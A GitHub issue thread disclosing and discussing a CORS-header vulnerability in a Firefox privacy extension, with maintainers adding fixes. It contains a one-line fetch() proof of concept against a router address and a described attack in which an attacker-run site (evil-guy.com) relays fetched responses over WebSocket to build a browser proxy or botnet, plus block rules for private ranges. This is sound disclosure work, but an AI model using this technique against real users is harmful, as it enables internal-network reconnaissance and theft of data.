Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Indiscriminate injection of "Access-Control-Allow-Origin: *" is unsafe #21

Open
tartpvule opened this issue Jan 21, 2019 · 23 comments
Open
Labels
bug Something isn't working enhancement New feature or request
Milestone

Comments

@tartpvule
Copy link

Proof of concept:
fetch('http://192.168.1.1/').then(function(response) { return response.text(); }).then(function(text) { alert('fulfilled\n\n' + text); }).catch(function(e) { alert('rejected\n\n' + String(e)); });
In the absence of other filtering extensions (e.g. uMatrix), this extension, by default, allows an arbitrary webpage to send GET requests to and read responses from sites it should not.
While vanilla Firefox allows sending GET requests to an arbitrary URL, it only allow the responses to be accessible to the request origin if and only if the target host allows it.
(Tested on Firefox ESR 60.4.0)

@claustromaniac
Copy link
Owner

claustromaniac commented Jan 21, 2019

This extension does not inject Access-Control-Allow-Origin: * indiscriminately. Would you be kind enough to explain how doing that is unsafe? but please do so after reading the documentation.

Thanks in advance.

EDIT: re-reading your post, is your concern about local servers specifically?

@tartpvule
Copy link
Author

tartpvule commented Jan 21, 2019

My concerns are primarily about servers in the internal network, yes.

From the documentation in "Is this extension safe?":

Why do I say this is safe? Because this only touches GET requests (and preflight requests for GET requests), and when it does, it always sets the Access-Control-Allow-Origin to *. When a request is altered this way, it only succeeds as long as it was not flagged as having credentials. Firefox aborts the request and throws a (healthy) yellow warning in the console otherwise.

But "GET requests that are not flagged as having credentials" are enough to do some reconnaissance on the user's internal network. This is particularly concerning in the case of home users with poorly secured "smart" devices.

I may have chosen the word "indiscriminate" wrongly? Please bear with me here.
From /src/bg/webRequest.js, my impression is that "Access-Control-Allow-Origin: *" is injected into all requests processed through the extension with not as much fine-tuning from the user as possible with the rules in extensions like uMatrix.
For instance, I do not think that forcing "Access-Control-Allow-Origin: *" for all request types is a good idea; "font" is less risky in this respect than "xmlhttprequest", in my opinion.
So, "indiscriminate" in the sense of "not doing things differently for the varying risks in request types, URLs involved, returning content types".
My opinion on this is "Let the user do the discriminating himself/herself".

Thank you

@claustromaniac
Copy link
Owner

claustromaniac commented Jan 21, 2019

Alright, thanks.

For starters, I think it would make sense for the extension to simply ignore all requests to internal networks. I'm considering the idea of giving users the choice of doing so only when the origin server is not in an internal network, but I'm not sure if that is worthwhile or not. Probably not.

As for your second point, I believe the potential risks left that are related to XHR-type requests can only happen in the scenario of making a cross-origin request to a badly designed and/or outdated server, and as stated in the documentation, those risks should be easily mitigated by using first-party isolation and/or containers. I'm all for letting users choose, but I need to draw some lines to prevent the complexity from growing to a point where it messes with user-friendliness. Also, I generally try to stick to minimalism because it makes projects maintainable, and it is the most effective way to avoid introducing bugs and vulnerabilities.

From your perspective, what would be an ideal way for the extension to give you those choices?

claustromaniac added a commit that referenced this issue Jan 22, 2019
Fixes a non-critical vulnerability: requests to loopback/private addresses should be ignored. See #21
@claustromaniac
Copy link
Owner

claustromaniac commented Jan 22, 2019

For the time being, I released 1.4.1b1.4.1b2 to address the first issue (private networks).

@tartpvule
Copy link
Author

I do not think there is a way to reliably discern internal networks from external networks from Firefox WebExtensions. IP addresses are the easy cases. But a hostname like "some-department.a-certain-institution.gov" might be resolved by the internal DNS server to a local address.
The only way to do this, I think, is to leave it to the user to decide the patterns himself/herself.

But then, while the scenario I tested is about attack reconnaissance into the internal network, it is not the only impact of this issue, as it effectively allows a remote web server to use visiters' browsers as a kind of limited HTTP GET proxy.
Scenario: Origin A uses fetch() to GET a URL (without the ability to send querystrings or authorizations) from origin B, then pipe the response to a WebSocket service in origin A.
Standard same-origin policy disallows reading the response from origin B by origin A unless an Access-Control-Allow-Origin header from origin B explicitly allows it.
So, I think this is a serious vulnerability. It is not limited to a misconfigured origin B either, just the fact that the browser can be used as a proxy to access, even if limited to "credential-less" GETs, a "politically sensitive" site for a hypothetical malicious actor is bad enough.

I propose:

  1. Only known "safe and unlikely to break" (user decides) request types are processed at all by this extension, maybe just "font" and "stylesheet" by default. This should cover Google Fonts and the like, with low risk of breaking anything else.
  2. A rulelist for advanced users to dictate which origin is allowed to access which origin. Let the user unbreak websites by himself/herself, like uMatrix. In other words, allow the user to decide precisely when to inject "Access-Control-Allow-Origin: *".
  3. For requests processed by the extension, if the server-supplied Access-Control-Allow-Origin header is stricter than "*", then leave it alone by default, but allow the user to decide if/when to override it.

Thank you

@claustromaniac
Copy link
Owner

claustromaniac commented Jan 22, 2019

I do not think there is a way to reliably discern internal networks from external networks from Firefox WebExtensions.

There is. The DNS API. But not everyone would want that. In the vast majority of cases it would end up being just unnecessary overhead. EDIT: It still might be worthwhile to add it as an option (default off).

The only way to do this, I think, is to leave it to the user to decide the patterns himself/herself.

I understand the following is not your preferred way to do this, but in case anyone else is wondering, this can already be done by using the Exclusions section. For example:

* *.a-certain-institution.gov

Will ignore requests from any origin to any host that ends in .a-certain-institution.gov.

So, I think this is a serious vulnerability.

I still disagree. It may be a serious vulnerability to you, depending on your threat model, but for most people this would at worst be an edge case. An adversary attempting that would have to be targeting this extension specifically, and apart from that risk of giving them access to "politically sensitive" information, I can't think of many other ways for this to be exploited in the wild (assuming well-configured target servers and/or using first-party isolation/containers).

As for your proposals...

  1. ✔️
  2. You do realize that this would make the extension unusable for most people, right?
  3. There are only three ways for Access-Control-Allow-Origin to be stricter than *:
    • No Access-Control-Allow-Origin at all. This is what the extension is expecting in most scenarios in its current form.
    • Access-Control-Allow-Origin: null tries to achieve the same as above, but is worse.
    • Access-Control-Allow-Origin that doesn't match the value of Origin. I have yet to come across a single case where this happens, but I agree that it would make sense to leave these alone.

Anyway, I appreciate all your valuable feedback. I will make a small release and then I'll have to do a lot of thinking. I'm sorry to say I can't promise anything, but you made some good points, so I'll try to add that functionality when I can. That being said, it wouldn't be wise for you to expect this extension to become the uMatrix of CORS, especially in terms of UI/UX. Realistically, I doubt I'll ever have the time for making fancy stuff like that.

@crssi
Copy link
Collaborator

crssi commented Jan 23, 2019

A brainstorm is happening in my head, but I have a question to understand better:
@tartpvule proposed that we do not touch requests, which source IPs are in a range of private/local address space?

@tartpvule
Copy link
Author

tartpvule commented Jan 23, 2019

@claustromaniac

DNS API

Did not know about that. Learn something new each day, I guess.

... , this can already be done by using the Exclusions section

I think this is acceptable.

I still disagree. It may be a serious vulnerability to you, depending on your threat model, but for most people this would at worst be an edge case.

If this extension gets popular enough (and I really hope it is, it is the only extension that specifically deals with the Origin header, as far as I know), it might turn out to be an attractive target. Elaborations below.

There are only three ways for Access-Control-Allow-Origin to be stricter ...

I agree.

uMatrix of CORS

That's my dream! :)

@crssi No, that is not my intention. No special treatments for servers in the internal network.
For ordinary users, and as the default setting, I proposed only touching the request types for which the responses are not exposed more than a vanilla Firefox allows ("stylesheet"), or the exposed information is minimal anyway ("font").
For advanced users, I proposed allowing complete user control over when to insert "Access-Control-Allow-Origin: *", based on the request type, the Content-Type header, and the URLs involved. In other words, uMatrix for CORS, which I understand that is a difficult undertaking (I am not skillful enough for this).

The scenario I started with is one where an origin in the "Internet zone" accesses an origin in the "Intranet zone", which in Firefox, would only be possible if the "Intranet zone" server replies with Access-Control-Allow-Origin set to "*" or a more permissive value. The problem is that POOP inserts that header, allowing access.
Then I realized that this essentially allows implementation of a (limited) HTTP proxy in Firefox, a mischievous guy might tunnel HTTP GET requests in order to browse ghacks.net. But a bad guy can use the same mechanism to make a zombie botnet of unsuspecting browsers to scan for unsecured IoT devices with open port 80 or to recon something a targeted user can access but the bad guy cannot due to IP whitelisting or something. This is the "serious vulnerability" I mentioned in the earlier comment.

Thank you

@crssi
Copy link
Collaborator

crssi commented Jan 23, 2019

I am really struggling to picture the scenario where you would visit an "Internet zone" page and get the additional resources over "Intranet zone" which would be harmful without the possibility for attacker to inject some content on network level as MitM. And for that, the "attacker" would already need to be on the "Intranet" network... which would anyway be a gameover and exploiting CORS would be nonsense.

But, I might still not see clearly the scenario/vulnerability vector you have in your mind.
Can you describe more picturesquely?

@tartpvule
Copy link
Author

tartpvule commented Jan 23, 2019

@crssi No MITM needed. Visiting an attacker's controlled domain is enough.
Consider the following scenario:

  1. A bad guy lures an unsuspecting user to an attacker-controlled website, e.g. a hacked blog, a dodgy warez site, a script-kiddie site, with either a click on a link, an iframe, etc.
  2. That attacker-controlled website (let's say www.evil-guy.com for the purpose of this example) serves up a Javascript application that do the following:
    2.1 Open a WebSocket to an attacker-controlled NodeJS server on evil-guy.com
    2.2 fetch() the URLs as directed by the WebSocket channel (like the one on my first post).
    2.3 Send the results of response.text() over WebSocket to the bad guy.
  3. Profit!

Normally, step 2.3 is only possible if the fetch()ed response contains an Access-Control-Allow-Origin permitting it, which is what this bug is about. Note that www.evil-guy.com is in "Internet zone" and the URLs can be any host, either "Intranet zone" (http://some-department.a-certain-institution.gov/) or "Internet zone" (http://www.ghacks.net/).
The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
The scenario I investigated is the case where this is used to go through the private IP address space (192.168.., and others), which on my test home network, allows getting my router's login page, which contains enough clue to infer the make and model of the device. Granted, this is not a complete compromise of the device, but it makes available information about my home network that would not have been available to an atacker otherwise, in other words, "reconnaissance".
Now imagine a future where this extension gets very popular, think uBlock Origin level of popular, a bot net of browsers doing fetch() for an enterprising bad guy is possible.

For the MITM in the local network case, it is "game over" like you said, but only for the MITMed HTTP traffic. Modern versions of Firefox, I think, block mixed content in this case by default.
But MITMs further away, like "The Great Firewall of China", are only "game over" for traffic crossing that MITM. There is no effect on communications between America and Japan other than the fact that "attacker-controlled website" is essentially the whole China.

Hope that clarify things

@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

Thank you, much better for my lazy brain. 😸

By default this WE does not touch POST requests and only GET requests in a relaxed mode for Fonts and CSS.
We can agree that not touching requests is safe so...
I would suggest that "Exclude root domain matches" should be enabled by default.
This way we avoid two things:

  1. Eliminating upper scenario when there are used domain names (or FQDN) for destination (most cases) and not IP probing.
    2, Eliminating possible breakages.
    I would also add the following to the Exclusions by default:
*.youtube.com *
*.google*.* *

This should be safe and mostly breakage free for a basic user.
Maybe would be nice to have a possibility to external Exclusion list,,, like uBO for filter lists and uM for assets. But for simplicity, I would have only one list.
I am prepared to maintain such list.
With those defaults WE can cover basic users.

Now for the scenario where local/private IP would be used...
The hopping into local/private IP could be a problem and it is not new.
In the past I remember that NoScript had solution named ABE (Application Boundary E... something).
To avoid such "hopping" I am using uM with the following ATM:

[::1] [::1] * allow
[fe80::1%lo0] [fe80::1%lo0] * allow
* [::1] * block
* [fe80::1%lo0] * block
* [ff02::1] * block
* [ff02::2] * block

* 0 * block
* 10 * block
* 127 * block
* 172.16 * block
* 172.17 * block
* 172.18 * block
* 172.19 * block
* 172.20 * block
* 172.21 * block
* 172.22 * block
* 172.23 * block
* 172.24 * block
* 172.25 * block
* 172.26 * block
* 172.27 * block
* 172.28 * block
* 172.29 * block
* 172.30 * block
* 172.31 * block
* 192.168 * block
* 255.255.255.255 * block
* localhost * block
10 10 * allow
127 127 * allow
172.16 172.16 * allow
172.17 172.17 * allow
172.18 172.18 * allow
172.19 172.19 * allow
172.20 172.20 * allow
172.21 172.21 * allow
172.22 172.22 * allow
172.23 172.23 * allow
172.24 172.24 * allow
172.25 172.25 * allow
172.26 172.26 * allow
172.27 172.27 * allow
172.28 172.28 * allow
172.29 172.29 * allow
172.30 172.30 * allow
172.31 172.31 * allow
192.168 192.168 * allow
localhost localhost * allow

Please note that IPv6 in the upper list is not trough, since I have IPv6 disabled, but in my ToDo list is also revisiting IPv6 ranges to make the upper list complete (higienic)... like adding fc00::/7 and simmilar.

@tartpvule could you be so kind to test your PoC (proof of concept) again, but this time adding the following into Exclusions list:
* 192.168.*
maybe another test with (if upper fails):
* 192.168.*.*

If the result is good, then we can populate Exclusion list with all local/private ranges (there are not many).

It could be that I have missed something or I am wrong at seeing stuff... I will be more than happy if you can, please, correct me in that case.

Thank you and cheers 😄

@tartpvule
Copy link
Author

First off, I made a mistake: I have been running POOP in Aggressive Mode all this time, and that turns out to be the key. This is due to (I think a bug) in /src/bg/webRequest.js.

if (
mode === 1 &&
!settings.strictTypes[d.type] && (
target.searchParams ||
target.hash ||
target.username ||
target.password
) || isReservedAddress(target.hostname)
) return;

(There is no " || isReservedAddress(target.hostname)" in the previous version)
The thing is: "target.searchParams" is always truthy, thus reduces the statement to "(mode === 1 && !settings.strictTypes[d.type] || isReservedAddress(target.hostname)".
So this means, the issue is only apparent when a) in Aggressive Mode or b) "xmlhttprequest" is checked in the "Type filters" section in the settings. (!!)
This ironically means that the default Relaxed Mode and default checked "font" and "stylesheet" is already what I proposed as number 1 a few comments back. (= secure)

@crssi Yes, that exclusion makes fetch('http://192.168.1.1/') fail, which is a good thing.
The new version with isReservedAddress(target.hostname) closed the easy route to brute force the private IPv4 addresses.
I have uploaded my HTTP Proxy-WebSocket PoC to GitHub, try it. It illustrates the remaining problem:
https://github.com/tartpvule/poc-poop-acao/

The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
... a bot net of browsers doing fetch() for an enterprising bad guy is possible.

Try using it to browse an HTTP site in the "Internet zone". No HTTPS support is implemented.

@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

I also wasn't aware the @claustromaniac already fixed private addresses. 😄
He is mr. fantastic. 😄

@claustromaniac
Copy link
Owner

claustromaniac commented Jan 24, 2019

I would suggest that "Exclude root domain matches" should be enabled by default.

That wouldn't affect the scenarios that @tartpvule layed out.

With those defaults WE can cover basic users.

That's what the relaxed mode is for.

If the result is good, then we can populate Exclusion list with all local/private ranges (there are not many).

There is no need for that, since 1.4.1 already handles the scenario of an origin triggering a request to a private IP address. See c0273c8 and 3900421

First off, I made a mistake: I have been running POOP in Aggressive Mode all this time, and that turns out to be the key. This is due to (I think a bug) in /src/bg/webRequest.js.
...
The thing is: "target.searchParams" is always truthy

That is a bug, but it shouldn't make any difference when it comes to dealing with private addresses, because the || operator has priority over && (it is evaluated afterwards). The bug you found just causes the extension to ignore more stuff than it should in relaxed mode. I just forgot to cast searchParams to a string. I'll fix that ASAP, thanks.

EDIT: Damn, I didn't read @crssi's last comment before writing mine (sorry).

claustromaniac added a commit that referenced this issue Jan 24, 2019
Fix relaxed mode searchParam condition. Thanks @tartpvule #21 (comment)
@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

I would suggest that "Exclude root domain matches" should be enabled by default.

That wouldn't affect the scenarios that @tartpvule layed out.

I know... it is OT. I am saying that it would be best, if this were default checked... IMHO

EDIT: Damn, I didn't read @crssi's last comment before writing mine (sorry).

😄 why "sorry", no need to be 😸

Cheers

@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

It is nice to have someone as @tartpvule participating. 👍

It illustrates the remaining problem

It must be late, since I am not sure that I understand correctly the "remaining problem". 😢

@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

@tartpvule
Do you know the project ghacks-user.js?
If not, take a look at (do not miss the "issues" debates too).

@tartpvule
Copy link
Author

It must be late, since I am not sure that I understand correctly the "remaining problem".

  1. A bad guy lures an unsuspecting user to an attacker-controlled website, e.g. a hacked blog, a dodgy warez site, a script-kiddie site, with either a click on a link, an iframe, etc.
  2. That attacker-controlled website (let's say www.evil-guy.com for the purpose of this example) serves up a Javascript application that do the following:
    2.1 Open a WebSocket to an attacker-controlled NodeJS server on evil-guy.com
    2.2 fetch() the URLs as directed by the WebSocket channel (like the one on my first post).
    2.3 Send the results of response.text() over WebSocket to the bad guy.

Normally, step 2.3 is only possible if the fetch()ed response contains an Access-Control-Allow-Origin permitting it

The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
... a bot net of browsers doing fetch() for an enterprising bad guy is possible.

You do not normally want someone using your browser as a free proxy/bot, especially if it can be used to implement an illicit Shodan-lite. (Shodan = https://www.shodan.io/)
Try out my https://github.com/tartpvule/poc-poop-acao/

After 449b334, now I want this more than ever...

Only known "safe and unlikely to break" (user decides) request types are processed at all by this extension, maybe just "font" and "stylesheet" by default. This should cover Google Fonts and the like, with low risk of breaking anything else.

There is no need for that, since 1.4.1 already handles the scenario of an origin triggering a request to a private IP address.

That is a step in the right direction, but it is not perfect.

  1. Exclusions must be added for every internal domains a user comes accross, for example, *.localdomain, *.local, *.a-certain-institution.gov, *.some-corporation.com. Imagine what someone who works at a lot of places must do then.
  2. It is possible to setup a public domain name that resolves to a private address. The DNS rebinding attack is a superset of this (See Tavis Ormandy's works). Holes in the same-origin policy (like this issue) makes an attacker's life much easier, as it makes only the first half of the attack unnecessary, albeit a reduced functionality is achieved, it is still enough to do reconnaissance. This can be prevented with a filtering DNS proxy that scrubs all answers with private IP addresses from outside the Intranet, which is not an impossible thing for an IT department.

Do you know the project ghacks-user.js?

Yes, great project, I have been using that in my private builds of Firefox for a few years.
Last year, I got to know about the "Origin header problem" from arkenfox/user.js#509 and https://www.ghacks.net/2019/01/19/privacy-oriented-origin-policy-for-firefox/ led me to this extension.

@crssi
Copy link
Collaborator

crssi commented Jan 24, 2019

So implementing DNS API matching isReservedAddress(target.hostname) would actually resolve the issue (?).

@claustromaniac
Copy link
Owner

claustromaniac commented Jan 24, 2019

That is a step in the right direction, but it is not perfect.

I know (I was replying to @crssi, not to you), but it will take a long time for me to implement what you proposed and I haven't even decided how I'll go about doing that (assumming I even manage to squeeze the time and motivation to do it in the first place).

@claustromaniac
Copy link
Owner

So implementing DNS API matching isReservedAddress(target.hostname) would actually resolve the issue (?).

That would require additional permissions and it would be unnecessary overhead like 99.9999999% percent of the time. IF I go that route, it will be optional and disabled by default (as I said above).

@crssi
Copy link
Collaborator

crssi commented Jan 25, 2019

Just my humble opinion:
@claustromaniac
I think there is no hurry.
As it is now, is safe to avoid drive-by opportunities for exploiting local network over guessing well known IP ranges.
Browsing normal sites I never had stumbled to such attacks. I had opportunities to see some in the past where I was searching for some info stumbling Russian "underground" sites.
If someone would like to exploit same vector by hostnames/domain is quite unlikely unless you are a point of interest target and someone would need to do quite a research to prepare such exploit and then to lure you into.
For sure it would be nice to implement DNSAPI for completeness and hygienic sake, but not before you are (and if you are) prepared to do so, so no pushing at all.
@tartpvule I hope as I see is right or do you have other ideas/concerns?

Anyway, I (possibly) will never be able to express gratitude as I feel for you @claustromaniac and for all ghacks-user.js company. I ❤️ you all.

@tartpvule
Copy link
Author

@crssi @claustromaniac ... There are two parts to this issue ...

  1. Internal network access

The scenario I started with is one where an origin in the "Internet zone" accesses an origin in the "Intranet zone", which in Firefox, would only be possible if the "Intranet zone" server replies with Access-Control-Allow-Origin set to "*" or a more permissive value. The problem is that POOP inserts that header, allowing access.

I consider this part to be solved (Thanks @claustromaniac) after c0273c8 and adding exclusions as per @claustromaniac's comment: * *.a-certain-institution.gov. The remaining "public domain name with private IP" is in the "not worse than before" territory, as demonstrated by the DNS rebind attack, it is also something a good IT department ought to filter in the first place.
More improvements, namely the bullets 2 and 3 of my proposals, are nice to have, but low priority and not particularly sensitive security-wise in my view.

  1. Arbitrary URL access

Then I realized that this essentially allows implementation of a (limited) HTTP proxy in Firefox, a mischievous guy might tunnel HTTP GET requests in order to browse ghacks.net. But a bad guy can use the same mechanism to make a zombie botnet of unsuspecting browsers to scan for unsecured IoT devices with open port 80 or to recon something a targeted user can access but the bad guy cannot due to IP whitelisting or something. This is the "serious vulnerability" I mentioned in the earlier comment.

This is an impact that I realized about two days after opening this issue, which my https://github.com/tartpvule/poc-poop-acao demonstrates. I have successfully browsed http://ghacks.net/ with this PoC proxy implementation. So this is still unsolved.
Before 449b334, this PoC does not work if a) "relaxed (default)" in the Global mode section and b) only "font" and "stylesheet" are checked in the Type filters section in the extension settings page, which, incidentally, is what my proposal bullet 1 states. Choosing "aggressive mode" makes my PoC works. (!!!)
So now I want something like if (d.type !== 'font' && d.type !== 'stylesheet') { return; } in onBeforeSendHeaders. A setting section to dictating "the specific types this extension should touch and nothing else" is nice to have here.

Thank you

@claustromaniac claustromaniac added the bug Something isn't working label May 9, 2019
@claustromaniac claustromaniac added this to the 1.5.0 milestone May 9, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working enhancement New feature or request
Projects
None yet
Development

No branches or pull requests

3 participants